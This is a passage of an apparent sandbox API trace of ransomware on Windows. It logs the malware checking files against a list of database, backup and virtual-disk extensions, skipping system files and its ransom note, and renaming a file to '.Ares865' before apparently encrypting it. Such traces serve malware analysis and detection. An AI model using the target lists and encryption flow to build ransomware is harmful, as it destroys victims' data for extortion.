[0063.648] lstrcmpiW (lpString1="htm", lpString2="^^^") returned 1 [0063.648] lstrlenW (lpString="abs") returned 3 [0063.648] lstrcmpiW (lpString1="htm", lpString2="abs") returned 1 [0063.648] lstrlenW (lpString="abx") returned 3 [0063.648] lstrcmpiW (lpString1="htm", lpString2="abx") returned 1 [0063.649] lstrlenW (lpString="accdb") returned 5 [0063.649] lstrcmpiW (lpString1="e.htm", lpString2="accdb") returned 1 [0063.649] lstrlenW (lpString="accdc") returned 5 [0063.649] lstrcmpiW (lpString1="e.htm", lpString2="accdc") returned 1 [0063.649] lstrlenW (lpString="accde") returned 5 [0063.649] lstrcmpiW (lpString1="e.htm", lpString2="accde") returned 1 [0063.649] lstrlenW (lpString="accdr") returned 5 [0063.649] lstrcmpiW (lpString1="e.htm", lpString2="accdr") returned 1 [0063.649] lstrlenW (lpString="accdt") returned 5 [0063.649] lstrcmpiW (lpString1="e.htm", lpString2="accdt") returned 1 [0063.649] lstrlenW (lpString="accdw") returned 5 [0063.649] lstrcmpiW (lpString1="e.htm", lpString2="accdw") returned 1 [0063.649] lstrlenW (lpString="accft") returned 5 [0063.649] lstrcmpiW (lpString1="e.htm", lpString2="accft") returned 1 [0063.649] lstrlenW (lpString="adb") returned 3 [0063.649] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.649] lstrlenW (lpString="adb") returned 3 [0063.649] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.649] lstrlenW (lpString="ade") returned 3 [0063.649] lstrcmpiW (lpString1="htm", lpString2="ade") returned 1 [0063.649] lstrlenW (lpString="adf") returned 3 [0063.649] lstrcmpiW (lpString1="htm", lpString2="adf") returned 1 [0063.649] lstrlenW (lpString="adn") returned 3 [0063.649] lstrcmpiW (lpString1="htm", lpString2="adn") returned 1 [0063.649] lstrlenW (lpString="adp") returned 3 [0063.649] lstrcmpiW (lpString1="htm", lpString2="adp") returned 1 [0063.649] lstrlenW (lpString="alf") returned 3 [0063.649] lstrcmpiW (lpString1="htm", lpString2="alf") returned 1 [0063.649] lstrlenW (lpString="ask") returned 3 [0063.649] lstrcmpiW (lpString1="htm", lpString2="ask") returned 1 [0063.649] lstrlenW (lpString="btr") returned 3 [0063.649] lstrcmpiW (lpString1="htm", lpString2="btr") returned 1 [0063.649] lstrlenW (lpString="cat") returned 3 [0063.649] lstrcmpiW (lpString1="htm", lpString2="cat") returned 1 [0063.649] lstrlenW (lpString="cdb") returned 3 [0063.649] lstrcmpiW (lpString1="htm", lpString2="cdb") returned 1 [0063.649] lstrlenW (lpString="ckp") returned 3 [0063.650] lstrcmpiW (lpString1="htm", lpString2="ckp") returned 1 [0063.650] lstrlenW (lpString="cma") returned 3 [0063.650] lstrcmpiW (lpString1="htm", lpString2="cma") returned 1 [0063.650] lstrlenW (lpString="cpd") returned 3 [0063.650] lstrcmpiW (lpString1="htm", lpString2="cpd") returned 1 [0063.650] lstrlenW (lpString="dacpac") returned 6 [0063.650] lstrcmpiW (lpString1="ue.htm", lpString2="dacpac") returned 1 [0063.650] lstrlenW (lpString="dad") returned 3 [0063.650] lstrcmpiW (lpString1="htm", lpString2="dad") returned 1 [0063.650] lstrlenW (lpString="dadiagrams") returned 10 [0063.650] lstrcmpiW (lpString1="f Blue.htm", lpString2="dadiagrams") returned 1 [0063.650] lstrlenW (lpString="daschema") returned 8 [0063.650] lstrcmpiW (lpString1="Blue.htm", lpString2="daschema") returned -1 [0063.650] lstrlenW (lpString="db-journal") returned 10 [0063.650] lstrcmpiW (lpString1="f Blue.htm", lpString2="db-journal") returned 1 [0063.650] lstrlenW (lpString="db-shm") returned 6 [0063.650] lstrcmpiW (lpString1="ue.htm", lpString2="db-shm") returned 1 [0063.650] lstrlenW (lpString="db-wal") returned 6 [0063.650] lstrcmpiW (lpString1="ue.htm", lpString2="db-wal") returned 1 [0063.650] lstrlenW (lpString="dbc") returned 3 [0063.650] lstrcmpiW (lpString1="htm", lpString2="dbc") returned 1 [0063.650] lstrlenW (lpString="dbs") returned 3 [0063.650] lstrcmpiW (lpString1="htm", lpString2="dbs") returned 1 [0063.650] lstrlenW (lpString="dbt") returned 3 [0063.650] lstrcmpiW (lpString1="htm", lpString2="dbt") returned 1 [0063.650] lstrlenW (lpString="dbv") returned 3 [0063.650] lstrcmpiW (lpString1="htm", lpString2="dbv") returned 1 [0063.650] lstrlenW (lpString="dbx") returned 3 [0063.650] lstrcmpiW (lpString1="htm", lpString2="dbx") returned 1 [0063.650] lstrlenW (lpString="dcb") returned 3 [0063.650] lstrcmpiW (lpString1="htm", lpString2="dcb") returned 1 [0063.650] lstrlenW (lpString="dct") returned 3 [0063.650] lstrcmpiW (lpString1="htm", lpString2="dct") returned 1 [0063.650] lstrlenW (lpString="dcx") returned 3 [0063.650] lstrcmpiW (lpString1="htm", lpString2="dcx") returned 1 [0063.651] lstrlenW (lpString="ddl") returned 3 [0063.651] lstrcmpiW (lpString1="htm", lpString2="ddl") returned 1 [0063.651] lstrlenW (lpString="dlis") returned 4 [0063.651] lstrcmpiW (lpString1=".htm", lpString2="dlis") returned -1 [0063.651] lstrlenW (lpString="dp1") returned 3 [0063.651] lstrcmpiW (lpString1="htm", lpString2="dp1") returned 1 [0063.651] lstrlenW (lpString="dqy") returned 3 [0063.651] lstrcmpiW (lpString1="htm", lpString2="dqy") returned 1 [0063.651] lstrlenW (lpString="dsk") returned 3 [0063.651] lstrcmpiW (lpString1="htm", lpString2="dsk") returned 1 [0063.651] lstrlenW (lpString="dsn") returned 3 [0063.651] lstrcmpiW (lpString1="htm", lpString2="dsn") returned 1 [0063.651] lstrlenW (lpString="dtsx") returned 4 [0063.651] lstrcmpiW (lpString1=".htm", lpString2="dtsx") returned -1 [0063.651] lstrlenW (lpString="dxl") returned 3 [0063.651] lstrcmpiW (lpString1="htm", lpString2="dxl") returned 1 [0063.651] lstrlenW (lpString="eco") returned 3 [0063.651] lstrcmpiW (lpString1="htm", lpString2="eco") returned 1 [0063.651] lstrlenW (lpString="ecx") returned 3 [0063.651] lstrcmpiW (lpString1="htm", lpString2="ecx") returned 1 [0063.651] lstrlenW (lpString="edb") returned 3 [0063.651] lstrcmpiW (lpString1="htm", lpString2="edb") returned 1 [0063.651] lstrlenW (lpString="epim") returned 4 [0063.651] lstrcmpiW (lpString1=".htm", lpString2="epim") returned -1 [0063.651] lstrlenW (lpString="fcd") returned 3 [0063.651] lstrcmpiW (lpString1="htm", lpString2="fcd") returned 1 [0063.651] lstrlenW (lpString="fdb") returned 3 [0063.651] lstrcmpiW (lpString1="htm", lpString2="fdb") returned 1 [0063.651] lstrlenW (lpString="fic") returned 3 [0063.651] lstrcmpiW (lpString1="htm", lpString2="fic") returned 1 [0063.651] lstrlenW (lpString="flexolibrary") returned 12 [0063.651] lstrcmpiW (lpString1=" of Blue.htm", lpString2="flexolibrary") returned -1 [0063.651] lstrlenW (lpString="fm5") returned 3 [0063.651] lstrcmpiW (lpString1="htm", lpString2="fm5") returned 1 [0063.651] lstrlenW (lpString="fmp") returned 3 [0063.651] lstrcmpiW (lpString1="htm", lpString2="fmp") returned 1 [0063.651] lstrlenW (lpString="fmp12") returned 5 [0063.652] lstrcmpiW (lpString1="e.htm", lpString2="fmp12") returned -1 [0063.652] lstrlenW (lpString="fmpsl") returned 5 [0063.652] lstrcmpiW (lpString1="e.htm", lpString2="fmpsl") returned -1 [0063.652] lstrlenW (lpString="fol") returned 3 [0063.652] lstrcmpiW (lpString1="htm", lpString2="fol") returned 1 [0063.652] lstrlenW (lpString="fp3") returned 3 [0063.652] lstrcmpiW (lpString1="htm", lpString2="fp3") returned 1 [0063.652] lstrlenW (lpString="fp4") returned 3 [0063.652] lstrcmpiW (lpString1="htm", lpString2="fp4") returned 1 [0063.652] lstrlenW (lpString="fp5") returned 3 [0063.652] lstrcmpiW (lpString1="htm", lpString2="fp5") returned 1 [0063.652] lstrlenW (lpString="fp7") returned 3 [0063.652] lstrcmpiW (lpString1="htm", lpString2="fp7") returned 1 [0063.652] lstrlenW (lpString="fpt") returned 3 [0063.652] lstrcmpiW (lpString1="htm", lpString2="fpt") returned 1 [0063.652] lstrlenW (lpString="frm") returned 3 [0063.652] lstrcmpiW (lpString1="htm", lpString2="frm") returned 1 [0063.652] lstrlenW (lpString="gdb") returned 3 [0063.652] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.652] lstrlenW (lpString="gdb") returned 3 [0063.652] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.652] lstrlenW (lpString="grdb") returned 4 [0063.652] lstrcmpiW (lpString1=".htm", lpString2="grdb") returned -1 [0063.652] lstrlenW (lpString="gwi") returned 3 [0063.652] lstrcmpiW (lpString1="htm", lpString2="gwi") returned 1 [0063.652] lstrlenW (lpString="hdb") returned 3 [0063.652] lstrcmpiW (lpString1="htm", lpString2="hdb") returned 1 [0063.652] lstrlenW (lpString="his") returned 3 [0063.652] lstrcmpiW (lpString1="htm", lpString2="his") returned 1 [0063.652] lstrlenW (lpString="ib") returned 2 [0063.652] lstrcmpiW (lpString1="tm", lpString2="ib") returned 1 [0063.652] lstrlenW (lpString="idb") returned 3 [0063.652] lstrcmpiW (lpString1="htm", lpString2="idb") returned -1 [0063.652] lstrlenW (lpString="ihx") returned 3 [0063.652] lstrcmpiW (lpString1="htm", lpString2="ihx") returned -1 [0063.652] lstrlenW (lpString="itdb") returned 4 [0063.652] lstrcmpiW (lpString1=".htm", lpString2="itdb") returned -1 [0063.653] lstrlenW (lpString="itw") returned 3 [0063.653] lstrcmpiW (lpString1="htm", lpString2="itw") returned -1 [0063.653] lstrlenW (lpString="jet") returned 3 [0063.653] lstrcmpiW (lpString1="htm", lpString2="jet") returned -1 [0063.653] lstrlenW (lpString="jtx") returned 3 [0063.653] lstrcmpiW (lpString1="htm", lpString2="jtx") returned -1 [0063.653] lstrlenW (lpString="kdb") returned 3 [0063.653] lstrcmpiW (lpString1="htm", lpString2="kdb") returned -1 [0063.653] lstrlenW (lpString="kexi") returned 4 [0063.653] lstrcmpiW (lpString1=".htm", lpString2="kexi") returned -1 [0063.653] lstrlenW (lpString="kexic") returned 5 [0063.653] lstrcmpiW (lpString1="e.htm", lpString2="kexic") returned -1 [0063.653] lstrlenW (lpString="kexis") returned 5 [0063.653] lstrcmpiW (lpString1="e.htm", lpString2="kexis") returned -1 [0063.653] lstrlenW (lpString="lgc") returned 3 [0063.653] lstrcmpiW (lpString1="htm", lpString2="lgc") returned -1 [0063.653] lstrlenW (lpString="lwx") returned 3 [0063.653] lstrcmpiW (lpString1="htm", lpString2="lwx") returned -1 [0063.653] lstrlenW (lpString="maf") returned 3 [0063.653] lstrcmpiW (lpString1="htm", lpString2="maf") returned -1 [0063.653] lstrlenW (lpString="maq") returned 3 [0063.653] lstrcmpiW (lpString1="htm", lpString2="maq") returned -1 [0063.653] lstrlenW (lpString="mar") returned 3 [0063.653] lstrcmpiW (lpString1="htm", lpString2="mar") returned -1 [0063.653] lstrlenW (lpString="marshal") returned 7 [0063.653] lstrcmpiW (lpString1="lue.htm", lpString2="marshal") returned -1 [0063.653] lstrlenW (lpString="mas") returned 3 [0063.653] lstrcmpiW (lpString1="htm", lpString2="mas") returned -1 [0063.653] lstrlenW (lpString="mav") returned 3 [0063.653] lstrcmpiW (lpString1="htm", lpString2="mav") returned -1 [0063.653] lstrlenW (lpString="maw") returned 3 [0063.653] lstrcmpiW (lpString1="htm", lpString2="maw") returned -1 [0063.653] lstrlenW (lpString="mdbhtml") returned 7 [0063.653] lstrcmpiW (lpString1="lue.htm", lpString2="mdbhtml") returned -1 [0063.653] lstrlenW (lpString="mdn") returned 3 [0063.653] lstrcmpiW (lpString1="htm", lpString2="mdn") returned -1 [0063.653] lstrlenW (lpString="mdt") returned 3 [0063.654] lstrcmpiW (lpString1="htm", lpString2="mdt") returned -1 [0063.654] lstrlenW (lpString="mfd") returned 3 [0063.654] lstrcmpiW (lpString1="htm", lpString2="mfd") returned -1 [0063.654] lstrlenW (lpString="mpd") returned 3 [0063.654] lstrcmpiW (lpString1="htm", lpString2="mpd") returned -1 [0063.654] lstrlenW (lpString="mrg") returned 3 [0063.654] lstrcmpiW (lpString1="htm", lpString2="mrg") returned -1 [0063.654] lstrlenW (lpString="mud") returned 3 [0063.654] lstrcmpiW (lpString1="htm", lpString2="mud") returned -1 [0063.654] lstrlenW (lpString="mwb") returned 3 [0063.654] lstrcmpiW (lpString1="htm", lpString2="mwb") returned -1 [0063.654] lstrlenW (lpString="myd") returned 3 [0063.654] lstrcmpiW (lpString1="htm", lpString2="myd") returned -1 [0063.654] lstrlenW (lpString="ndf") returned 3 [0063.654] lstrcmpiW (lpString1="htm", lpString2="ndf") returned -1 [0063.654] lstrlenW (lpString="nnt") returned 3 [0063.654] lstrcmpiW (lpString1="htm", lpString2="nnt") returned -1 [0063.654] lstrlenW (lpString="nrmlib") returned 6 [0063.654] lstrcmpiW (lpString1="ue.htm", lpString2="nrmlib") returned 1 [0063.654] lstrlenW (lpString="ns2") returned 3 [0063.654] lstrcmpiW (lpString1="htm", lpString2="ns2") returned -1 [0063.654] lstrlenW (lpString="ns3") returned 3 [0063.654] lstrcmpiW (lpString1="htm", lpString2="ns3") returned -1 [0063.654] lstrlenW (lpString="ns4") returned 3 [0063.654] lstrcmpiW (lpString1="htm", lpString2="ns4") returned -1 [0063.654] lstrlenW (lpString="nsf") returned 3 [0063.654] lstrcmpiW (lpString1="htm", lpString2="nsf") returned -1 [0063.654] lstrlenW (lpString="nv") returned 2 [0063.655] lstrcmpiW (lpString1="tm", lpString2="nv") returned 1 [0063.655] lstrlenW (lpString="nv2") returned 3 [0063.655] lstrcmpiW (lpString1="htm", lpString2="nv2") returned -1 [0063.655] lstrlenW (lpString="nwdb") returned 4 [0063.655] lstrcmpiW (lpString1=".htm", lpString2="nwdb") returned -1 [0063.655] lstrlenW (lpString="nyf") returned 3 [0063.655] lstrcmpiW (lpString1="htm", lpString2="nyf") returned -1 [0063.655] lstrlenW (lpString="odb") returned 3 [0063.655] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.655] lstrlenW (lpString="odb") returned 3 [0063.655] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.655] lstrlenW (lpString="oqy") returned 3 [0063.655] lstrcmpiW (lpString1="htm", lpString2="oqy") returned -1 [0063.655] lstrlenW (lpString="ora") returned 3 [0063.655] lstrcmpiW (lpString1="htm", lpString2="ora") returned -1 [0063.655] lstrlenW (lpString="orx") returned 3 [0063.655] lstrcmpiW (lpString1="htm", lpString2="orx") returned -1 [0063.655] lstrlenW (lpString="owc") returned 3 [0063.655] lstrcmpiW (lpString1="htm", lpString2="owc") returned -1 [0063.655] lstrlenW (lpString="p96") returned 3 [0063.655] lstrcmpiW (lpString1="htm", lpString2="p96") returned -1 [0063.655] lstrlenW (lpString="p97") returned 3 [0063.655] lstrcmpiW (lpString1="htm", lpString2="p97") returned -1 [0063.655] lstrlenW (lpString="pan") returned 3 [0063.655] lstrcmpiW (lpString1="htm", lpString2="pan") returned -1 [0063.655] lstrlenW (lpString="pdb") returned 3 [0063.655] lstrcmpiW (lpString1="htm", lpString2="pdb") returned -1 [0063.655] lstrlenW (lpString="pdm") returned 3 [0063.655] lstrcmpiW (lpString1="htm", lpString2="pdm") returned -1 [0063.655] lstrlenW (lpString="pnz") returned 3 [0063.655] lstrcmpiW (lpString1="htm", lpString2="pnz") returned -1 [0063.655] lstrlenW (lpString="qry") returned 3 [0063.655] lstrcmpiW (lpString1="htm", lpString2="qry") returned -1 [0063.655] lstrlenW (lpString="qvd") returned 3 [0063.655] lstrcmpiW (lpString1="htm", lpString2="qvd") returned -1 [0063.655] lstrlenW (lpString="rbf") returned 3 [0063.655] lstrcmpiW (lpString1="htm", lpString2="rbf") returned -1 [0063.656] lstrlenW (lpString="rctd") returned 4 [0063.656] lstrcmpiW (lpString1=".htm", lpString2="rctd") returned -1 [0063.656] lstrlenW (lpString="rod") returned 3 [0063.656] lstrcmpiW (lpString1="htm", lpString2="rod") returned -1 [0063.656] lstrlenW (lpString="rodx") returned 4 [0063.656] lstrcmpiW (lpString1=".htm", lpString2="rodx") returned -1 [0063.656] lstrlenW (lpString="rpd") returned 3 [0063.656] lstrcmpiW (lpString1="htm", lpString2="rpd") returned -1 [0063.656] lstrlenW (lpString="rsd") returned 3 [0063.656] lstrcmpiW (lpString1="htm", lpString2="rsd") returned -1 [0063.656] lstrlenW (lpString="sas7bdat") returned 8 [0063.656] lstrcmpiW (lpString1="Blue.htm", lpString2="sas7bdat") returned -1 [0063.656] lstrlenW (lpString="sbf") returned 3 [0063.656] lstrcmpiW (lpString1="htm", lpString2="sbf") returned -1 [0063.656] lstrlenW (lpString="scx") returned 3 [0063.656] lstrcmpiW (lpString1="htm", lpString2="scx") returned -1 [0063.656] lstrlenW (lpString="sdb") returned 3 [0063.656] lstrcmpiW (lpString1="htm", lpString2="sdb") returned -1 [0063.656] lstrlenW (lpString="sdc") returned 3 [0063.656] lstrcmpiW (lpString1="htm", lpString2="sdc") returned -1 [0063.656] lstrlenW (lpString="sdf") returned 3 [0063.656] lstrcmpiW (lpString1="htm", lpString2="sdf") returned -1 [0063.656] lstrlenW (lpString="sis") returned 3 [0063.656] lstrcmpiW (lpString1="htm", lpString2="sis") returned -1 [0063.656] lstrlenW (lpString="spq") returned 3 [0063.656] lstrcmpiW (lpString1="htm", lpString2="spq") returned -1 [0063.656] lstrlenW (lpString="te") returned 2 [0063.656] lstrcmpiW (lpString1="tm", lpString2="te") returned 1 [0063.656] lstrlenW (lpString="teacher") returned 7 [0063.656] lstrcmpiW (lpString1="lue.htm", lpString2="teacher") returned -1 [0063.656] lstrlenW (lpString="tmd") returned 3 [0063.656] lstrcmpiW (lpString1="htm", lpString2="tmd") returned -1 [0063.656] lstrlenW (lpString="tps") returned 3 [0063.656] lstrcmpiW (lpString1="htm", lpString2="tps") returned -1 [0063.656] lstrlenW (lpString="trc") returned 3 [0063.656] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.657] lstrlenW (lpString="trc") returned 3 [0063.657] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.657] lstrlenW (lpString="trm") returned 3 [0063.657] lstrcmpiW (lpString1="htm", lpString2="trm") returned -1 [0063.657] lstrlenW (lpString="udb") returned 3 [0063.657] lstrcmpiW (lpString1="htm", lpString2="udb") returned -1 [0063.657] lstrlenW (lpString="udl") returned 3 [0063.657] lstrcmpiW (lpString1="htm", lpString2="udl") returned -1 [0063.657] lstrlenW (lpString="usr") returned 3 [0063.657] lstrcmpiW (lpString1="htm", lpString2="usr") returned -1 [0063.657] lstrlenW (lpString="v12") returned 3 [0063.657] lstrcmpiW (lpString1="htm", lpString2="v12") returned -1 [0063.657] lstrlenW (lpString="vis") returned 3 [0063.657] lstrcmpiW (lpString1="htm", lpString2="vis") returned -1 [0063.657] lstrlenW (lpString="vpd") returned 3 [0063.657] lstrcmpiW (lpString1="htm", lpString2="vpd") returned -1 [0063.657] lstrlenW (lpString="vvv") returned 3 [0063.657] lstrcmpiW (lpString1="htm", lpString2="vvv") returned -1 [0063.657] lstrlenW (lpString="wdb") returned 3 [0063.657] lstrcmpiW (lpString1="htm", lpString2="wdb") returned -1 [0063.657] lstrlenW (lpString="wmdb") returned 4 [0063.657] lstrcmpiW (lpString1=".htm", lpString2="wmdb") returned -1 [0063.657] lstrlenW (lpString="wrk") returned 3 [0063.657] lstrcmpiW (lpString1="htm", lpString2="wrk") returned -1 [0063.657] lstrlenW (lpString="xdb") returned 3 [0063.657] lstrcmpiW (lpString1="htm", lpString2="xdb") returned -1 [0063.657] lstrlenW (lpString="xld") returned 3 [0063.657] lstrcmpiW (lpString1="htm", lpString2="xld") returned -1 [0063.657] lstrlenW (lpString="xmlff") returned 5 [0063.657] lstrcmpiW (lpString1="e.htm", lpString2="xmlff") returned -1 [0063.657] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.Ares865") returned 97 [0063.657] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\shades of blue.htm"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\shades of blue.htm.ares865"), dwFlags=0x1) returned 1 [0063.658] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\shades of blue.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.658] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=237) returned 1 [0063.658] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.659] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.659] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.659] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.660] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f0, lpName=0x0) returned 0x164 [0063.662] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f0) returned 0x190000 [0063.662] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.663] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.663] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.663] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.663] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0063.663] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.663] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0063.663] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.664] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.664] CloseHandle (hObject=0x164) returned 1 [0063.664] CloseHandle (hObject=0x154) returned 1 [0063.664] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.664] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.664] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.664] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x649d3c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x649d3c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaa58d6e3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x127e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ShadesOfBlue.jpg", cAlternateFileName="SHADES~1.JPG")) returned 1 [0063.664] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0063.664] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="aoldtz.exe") returned 1 [0063.664] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2=".") returned 1 [0063.664] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="..") returned 1 [0063.664] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="windows") returned -1 [0063.664] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="bootmgr") returned 1 [0063.664] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="temp") returned -1 [0063.664] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="pagefile.sys") returned 1 [0063.664] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="boot") returned 1 [0063.664] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="ids.txt") returned 1 [0063.664] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="ntuser.dat") returned 1 [0063.664] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="perflogs") returned 1 [0063.664] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="MSBuild") returned 1 [0063.664] lstrlenW (lpString="ShadesOfBlue.jpg") returned 16 [0063.664] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 89 [0063.664] lstrcpyW (in: lpString1=0x2cce48e, lpString2="ShadesOfBlue.jpg" | out: lpString1="ShadesOfBlue.jpg") returned="ShadesOfBlue.jpg" [0063.664] lstrlenW (lpString="ShadesOfBlue.jpg") returned 16 [0063.664] lstrlenW (lpString="Ares865") returned 7 [0063.664] lstrcmpiW (lpString1="lue.jpg", lpString2="Ares865") returned 1 [0063.665] lstrlenW (lpString=".dll") returned 4 [0063.665] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2=".dll") returned 1 [0063.665] lstrlenW (lpString=".lnk") returned 4 [0063.665] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2=".lnk") returned 1 [0063.665] lstrlenW (lpString=".ini") returned 4 [0063.665] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2=".ini") returned 1 [0063.665] lstrlenW (lpString=".sys") returned 4 [0063.665] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2=".sys") returned 1 [0063.665] lstrlenW (lpString="ShadesOfBlue.jpg") returned 16 [0063.665] lstrlenW (lpString="bak") returned 3 [0063.665] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0063.665] lstrlenW (lpString="ba_") returned 3 [0063.665] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0063.665] lstrlenW (lpString="dbb") returned 3 [0063.665] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0063.665] lstrlenW (lpString="vmdk") returned 4 [0063.665] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0063.665] lstrlenW (lpString="rar") returned 3 [0063.665] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0063.665] lstrlenW (lpString="zip") returned 3 [0063.665] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0063.665] lstrlenW (lpString="tgz") returned 3 [0063.665] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0063.665] lstrlenW (lpString="vbox") returned 4 [0063.665] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0063.665] lstrlenW (lpString="vdi") returned 3 [0063.665] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0063.665] lstrlenW (lpString="vhd") returned 3 [0063.665] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0063.665] lstrlenW (lpString="vhdx") returned 4 [0063.665] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0063.665] lstrlenW (lpString="avhd") returned 4 [0063.665] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0063.665] lstrlenW (lpString="db") returned 2 [0063.665] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0063.665] lstrlenW (lpString="db2") returned 3 [0063.665] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0063.665] lstrlenW (lpString="db3") returned 3 [0063.666] lstrcmpiW 